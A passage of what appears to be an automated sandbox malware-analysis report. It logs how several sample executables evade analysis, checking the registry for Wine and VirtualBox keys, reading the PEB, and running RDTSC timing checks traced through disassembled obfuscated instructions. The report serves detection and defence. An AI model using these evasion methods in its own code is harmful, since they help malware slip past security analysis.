Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FCFF7 second address: 10FCFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FCFFB second address: 10FCFFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F1226 second address: 10F1247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F528074EBDFh 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 jns 00007F528074EBD6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FC079 second address: 10FC07F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FC07F second address: 10FC08C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FC1E3 second address: 10FC1E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FC34F second address: 10FC355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FC355 second address: 10FC360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F528105F326h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FC360 second address: 10FC36F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F528074EBDAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FC36F second address: 10FC379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FC74C second address: 10FC750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FF78B second address: 10FF836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 2F9AC42Eh 0x0000000c movzx esi, cx 0x0000000f push 00000003h 0x00000011 mov di, cx 0x00000014 push 00000000h 0x00000016 mov ecx, dword ptr [ebp+122D3896h] 0x0000001c push 00000003h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007F528105F328h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 mov dword ptr [ebp+122D1997h], eax 0x0000003e mov dword ptr [ebp+122D36FBh], esi 0x00000044 push BBEFA9F1h 0x00000049 jnc 00007F528105F32Ah 0x0000004f add dword ptr [esp], 0410560Fh 0x00000056 push 00000000h 0x00000058 push edx 0x00000059 call 00007F528105F328h 0x0000005e pop edx 0x0000005f mov dword ptr [esp+04h], edx 0x00000063 add dword ptr [esp+04h], 00000019h 0x0000006b inc edx 0x0000006c push edx 0x0000006d ret 0x0000006e pop edx 0x0000006f ret 0x00000070 mov dword ptr [ebp+122D1B4Fh], ebx 0x00000076 lea ebx, dword ptr [ebp+124535F8h] 0x0000007c mov edi, 524FD18Dh 0x00000081 xchg eax, ebx 0x00000082 push eax 0x00000083 push edx 0x00000084 push eax 0x00000085 push edx 0x00000086 jmp 00007F528105F334h 0x0000008b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FF836 second address: 10FF84B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528074EBE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FF8B9 second address: 10FF986 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F528105F334h 0x0000000f push 00000000h 0x00000011 pushad 0x00000012 call 00007F528105F32Bh 0x00000017 mov dword ptr [ebp+122D29EDh], ecx 0x0000001d pop edx 0x0000001e mov edx, dword ptr [ebp+122D3AD6h] 0x00000024 popad 0x00000025 call 00007F528105F329h 0x0000002a jnc 00007F528105F32Ah 0x00000030 push eax 0x00000031 jns 00007F528105F338h 0x00000037 mov eax, dword ptr [esp+04h] 0x0000003b jmp 00007F528105F330h 0x00000040 mov eax, dword ptr [eax] 0x00000042 ja 00007F528105F332h 0x00000048 jnc 00007F528105F32Ch 0x0000004e mov dword ptr [esp+04h], eax 0x00000052 jl 00007F528105F334h 0x00000058 push ecx 0x00000059 jmp 00007F528105F32Ch 0x0000005e pop ecx 0x0000005f pop eax 0x00000060 push 00000003h 0x00000062 mov esi, dword ptr [ebp+122D3A76h] 0x00000068 mov edi, 3D9F62CCh 0x0000006d push 00000000h 0x0000006f stc 0x00000070 push 00000003h 0x00000072 mov ecx, dword ptr [ebp+122D1D39h] 0x00000078 mov si, bx 0x0000007b push A440E191h 0x00000080 push eax 0x00000081 push edx 0x00000082 push eax 0x00000083 push edx 0x00000084 push esi 0x00000085 pop esi 0x00000086 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FF986 second address: 10FF98C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FFA51 second address: 10FFA8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F331h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dx, 0D4Ch 0x00000010 push 00000000h 0x00000012 mov ecx, 2CDD2BCEh 0x00000017 js 00007F528105F32Ch 0x0000001d mov edi, dword ptr [ebp+122D3912h] 0x00000023 push 671B786Ah 0x00000028 push eax 0x00000029 push edx 0x0000002a push ecx 0x0000002b jnl 00007F528105F326h 0x00000031 pop ecx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11218B8 second address: 11218BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F616 second address: 111F62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F528105F333h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F62E second address: 111F64B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528074EBE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F64B second address: 111F64F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F64F second address: 111F653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F7C7 second address: 111F7D2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 js 00007F528105F326h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111FD89 second address: 111FD93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F528074EBD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111FD93 second address: 111FD9E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11200B8 second address: 11200BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11200BE second address: 11200D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F528105F326h 0x0000000a popad 0x0000000b jns 00007F528105F32Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1120248 second address: 1120273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F528074EBD6h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007F528074EBE2h 0x00000014 pop esi 0x00000015 pushad 0x00000016 push ebx 0x00000017 pushad 0x00000018 popad 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1120273 second address: 1120277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1120505 second address: 112050B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112050B second address: 112051C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F528105F32Ch 0x0000000b jc 00007F528105F326h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112051C second address: 1120521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11206D0 second address: 11206E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007F528105F326h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1113BA3 second address: 1113BC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F528074EBE4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11209ED second address: 1120A0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F333h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F528105F326h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1120A0C second address: 1120A12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1120A12 second address: 1120A33 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F528105F334h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1120A33 second address: 1120A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 jc 00007F528074EBD6h 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1121120 second address: 112112A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F528105F326h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112112A second address: 1121154 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F528074EBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F528074EBE7h 0x00000010 jne 00007F528074EBD6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1121283 second address: 1121287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1121287 second address: 11212B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528074EBDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F528074EBE1h 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F528074EBD6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11212B0 second address: 11212B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11212B4 second address: 11212B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1124A2A second address: 1124A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1124D8A second address: 1124D90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1125F31 second address: 1125F37 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1125F37 second address: 1125F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1125F3D second address: 1125F4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F528105F32Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1125F4D second address: 1125FAD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F528074EBE7h 0x0000000e pushad 0x0000000f jmp 00007F528074EBE2h 0x00000014 jmp 00007F528074EBE8h 0x00000019 jno 00007F528074EBD6h 0x0000001f jmp 00007F528074EBDBh 0x00000024 popad 0x00000025 push edi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1125FAD second address: 1125FB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8A6B second address: 10E8A6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8A6F second address: 10E8A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8A75 second address: 10E8A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F528074EBE8h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112C68D second address: 112C697 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F528105F326h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112C697 second address: 112C6B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a jmp 00007F528074EBE5h 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112C6B9 second address: 112C6BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112C7E3 second address: 112C7E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112C933 second address: 112C938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112C938 second address: 112C93F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112EDB6 second address: 112EDBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112EDBA second address: 112EDD1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F528074EBDFh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112EDD1 second address: 112EDD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112EEE8 second address: 112EEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112EEEC second address: 112EF08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F528105F328h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 je 00007F528105F32Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112F082 second address: 112F086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112F296 second address: 112F2A0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F528105F326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112F2A0 second address: 112F2AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F528074EBD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112FA7E second address: 112FA93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F528105F331h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112FA93 second address: 112FAD3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F528074EBD8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 mov di, CB62h 0x00000029 mov esi, dword ptr [ebp+122D1C99h] 0x0000002f nop 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 push esi 0x00000034 pop esi 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112FAD3 second address: 112FB0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F339h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F528105F333h 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112FBB9 second address: 112FBDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F528074EBE7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112FBDB second address: 112FBE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112FD47 second address: 112FD4C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112FEDA second address: 112FEDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1130084 second address: 11300A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnp 00007F528074EBDCh 0x0000000b jbe 00007F528074EBD6h 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F528074EBDDh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11300A6 second address: 11300AB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11305DA second address: 11305E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
